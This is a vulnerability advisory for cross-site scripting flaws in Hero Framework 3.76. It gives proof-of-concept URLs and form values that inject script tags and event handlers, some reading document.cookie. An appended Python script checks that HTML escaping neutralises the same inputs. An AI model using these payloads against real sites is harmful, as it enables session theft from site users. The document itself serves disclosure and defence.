Hero Framework 3.76 Cross Site Scripting

2013.01.11
Credit: L@usch
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Advisory: Hero Framework 3.76 Multiple Cross-site Scripting vulnerabilities
Advisory ID: SSCHADV2012-023
Author: L@usch
Affected Software: Successfully tested on Hero Framework 3.76
Vendor URL: http://www.heroframework.com/
Vendor Status: informed

===========================
Vulnerability Description
===========================

Hero Framework 3.76 is prone to multiple Cross-Site Scripting vulnerabilities.

======================
PoC-Exploit
======================

http://[target]/hero_os/users/login?errors=true&username='"></style></script><script>alert(document.cookie)</script>
http://[target]/hero_os/search?q=" onmouseover%3dalert(/XSS/) %3d"
http://[target]/hero_os/users/login?errors=true&username=" onmouseover%3dalert(/XSS/) %3d"

// POST-Parameter
Username: '"><script>alert(document.cookie)</script>
First Name: '"><script>alert(document.cookie)</script>
Last Name: '"><script>alert(document.cookie)</script>

======================
Solution
======================

- -

======================
Disclosure Timeline
======================

16-Dec-2012 - informed via contact form
16-Dec-2012 - feedback from vendor

======================
Credits
======================

Vulnerabilities found and advisory written by Stefan Schurtz.

======================
References
======================

http://www.darksecurity.de/advisories/2012/SSCHADV2012-023.txt
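The advisory's Solution section is empty, so as an added example (not part of the advisory or of Hero Framework's code) the script below takes the reflected username values from the two login PoC URLs above, renders them through a hypothetical raw-interpolation template and through one that HTML-escapes for the attribute and text contexts, and uses Python's HTML parser to check whether the value could leave its intended context. The host name and both templates are constructed stand-ins.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The advisory's two login PoC URLs, with "[target]" replaced by a constructed
# placeholder host so that urlsplit() accepts them.
POC_URLS = [
    "http://hero-app.example/hero_os/users/login?errors=true&username="
    "'\"></style></script><script>alert(document.cookie)</script>",
    "http://hero-app.example/hero_os/users/login?errors=true&username="
    '" onmouseover%3dalert(/XSS/) %3d"',
]

def reflected_username(url: str) -> str:
    """Extract the URL-decoded username parameter the login page reflects."""
    return parse_qs(urlsplit(url).query)["username"][0]

def render_unsafe(username: str) -> str:
    """Hypothetical vulnerable template: raw interpolation (CWE-79)."""
    return (f'<input type="text" name="username" value="{username}">'
            f'<p class="error">Unknown user {username}</p>')

def render_safe(username: str) -> str:
    """Hardened template: quote=True escapes both quote styles as well as
    <, > and &, so the value can neither close the attribute nor open a tag."""
    safe = html.escape(username, quote=True)
    return (f'<input type="text" name="username" value="{safe}">'
            f'<p class="error">Unknown user {safe}</p>')

class _TagAudit(HTMLParser):
    """Collects every tag and attribute name the parser sees in the output."""
    def __init__(self):
        super().__init__()
        self.tags, self.attrs = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.extend(name for name, _ in attrs)

def is_inert(rendered: str) -> bool:
    """True when only the template's own tags and attributes are present,
    i.e. the reflected value stayed inside its intended context."""
    audit = _TagAudit()
    audit.feed(rendered)
    return (audit.tags == ["input", "p"]
            and set(audit.attrs) <= {"type", "name", "value", "class"})

if __name__ == "__main__":
    for url in POC_URLS:
        u = reflected_username(url)
        print(f"{u!r}: unsafe inert={is_inert(render_unsafe(u))}, "
              f"safe inert={is_inert(render_safe(u))}")
```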

References:

http://www.darksecurity.de/advisories/2012/SSCHADV2012-023.txt

